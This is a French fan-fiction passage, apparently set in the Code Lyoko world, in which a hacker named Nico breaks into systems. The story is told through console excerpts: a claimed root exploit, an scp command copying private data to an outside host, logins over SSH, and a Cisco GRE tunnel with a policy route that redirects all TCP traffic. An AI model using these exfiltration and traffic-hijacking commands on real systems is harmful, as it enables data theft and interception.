Dernière édition le 01 avril 2008
** Mars 1999, Nico **
- Bon, là, ça devrait marcher ... disait Nico en relançant un programme légérement modifié depuis le lamentable crash d'il y a quelque seconde.
console a écrit: |
Exploiting SSL security hole in ssh-agent... Done ! # id -a uid=0(root) gid=0(root) groups=0(root) |
console a écrit: |
Broadcast message from security@lucifer on ttyp42 at 19:30 ... Warning ! Security Violation Detected ! Please backup your files and disconnect NOW ! System is going to shutdown in 20 seconds ! |
console a écrit: |
# scp /priv/data/* hehe@zoom.ps4net17.com:/opt/cstrike/datas/ Broadcast message from root@lucifer on ttyp0 at 19:30 ... System is going to shutdown in 5 seconds ! # Connection reset by peer ssh: Connection reset by peer hehe@zoom:/opt/cstrike/datas/$ ls <...> project-carthage.tar.bz2 project-xanadu.tar.bz2 <...> |
console a écrit: |
Cell 01 - Address: 02:03:05:07:11:13 ESSID:"xanadu" Mode:Master Frequency:2.462 GHz (Channel 11) Signal level:-55 dBm Noise level:-88 dBm Encryption key:on |
console a écrit: |
SC> show user * summary 10 years, 4 months, 13 days, 21:11:03 up 6:57, 91 users, load average: 16,19, 8,11, 9,09 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT xana pte/6 franz pte/21 - 10 years, 4 months, 13 days, 21:00 14.24s 0.00s 0.00s /sys/bin/gest root pts/0 - - - - - |
console a écrit: |
ALERT! ALERT! ALERT! Cannot connect to message bus system! Warning: inconsistency detected in Lyoko! =====> ASSERT FAILED at 0x2ffac9b3 ! =====> ASSERT FAILED at 0x82145de ! |
shell a écrit: |
Dev Access -- Do Not Use In Production ! login:/> |
shell a écrit: |
root:~> find .ssh .ssh/known_hosts .ssh/id_dsa .ssh/id_dsa.pub .ssh/config root:~> cat .ssh/config Host 10.235.71.113 CheckHostIP yes StrictHostKeyChecking yes Port 22 Protocol 2 SendEnv LANG LC_* HashKnownHosts yes User f.hopper |
shell a écrit: |
root:~> ssh 10.235.71.113 Last login: Tuesday, 31 December 1996 23:59:59 from 150.177.2.193 SC> |
shell a écrit: |
SC> ssh -l qwerty1 st0rage.org The authenticity of host 'ssh.unhandledexceptions.com (69.128.116.234)' can't be established. RSA key fingerprint is 43:97:d3:0b:a0:46:9a:b0:11:e8:33:45:2f:25:cd:cd. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'ssh.unhandledexceptions.com' (RSA) to the list of known hosts. Password: Linux ssh.unhandledexceptions.com 2.4.26-1-386 #1 Tue Aug 24 13:31:19 JST 2004 i686 Please behave yourself. Rules: 1) No running sevices, unless you have permission from Termina. This includes irc bots, vnc, etc. 2) IRC clients are allowed. No EggDrop/bots allowed. 3) Do not attempt to view/access files belonging to other users. 4) Report any problems you find immediatly to termina@gmail.com 5) Any abuse (.plan, etc) will result in immediate account deletion, and IP ban from both site and IRC. Thanks for your understanding Last login: Thu Apr 26 10:40:19 2007 from mail.boursorama.fr qwerty1@ssh:~$ finger qwerty1 Login: qwerty1 Name: Directory: /home/qwerty1 Shell: /bin/bash On since Thu Apr 26 10:42 (CDT) on pts/28 from 0.2.3.5 2 seconds idle No mail. No plan. qwerty1@ssh:~$ host 150.177.2.193 193.2.177.150.in-addr.arpa domain name pointer m830w193.ftmeade.army.mil. |
Routeur cisco à dit : |
cisco#conf t Enter configuration commands, one per line. End with CNTL/Z. cisco(config)#int tunnel0 cisco(config-if)#desc Nico was here. cisco(config-if)#ip address 1.1.1.1 255.255.255.0 cisco(config-if)#tunnel source eth0 cisco(config-if)#tunnel dest 10.235.71.142 cisco(config-if)#tunnel mode gre ip cisco(config-if)#exit cisco(config)# |
Routeur cisco à dit : |
cisco#ping 1.1.1.2 Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 1.1.1.2, timeout is 2 seconds: !!!!! Success rate is 100 percent (5/5), round-trip min/avg/max = 8/8/8 ms |
Routeur cisco à dit : |
cisco(config)#access-list 123 permit tcp any any cisco(config)#route-map nicohack cisco(config-route-map)#match ip address 123 cisco(config-route-map)#set ip next-hop 1.1.1.2 cisco(config-route-map)#exit cisco(config)#int eth0 cisco(config-if)#ip policy route-map nicohack cisco(config-if)#exit cisco(config)#exit |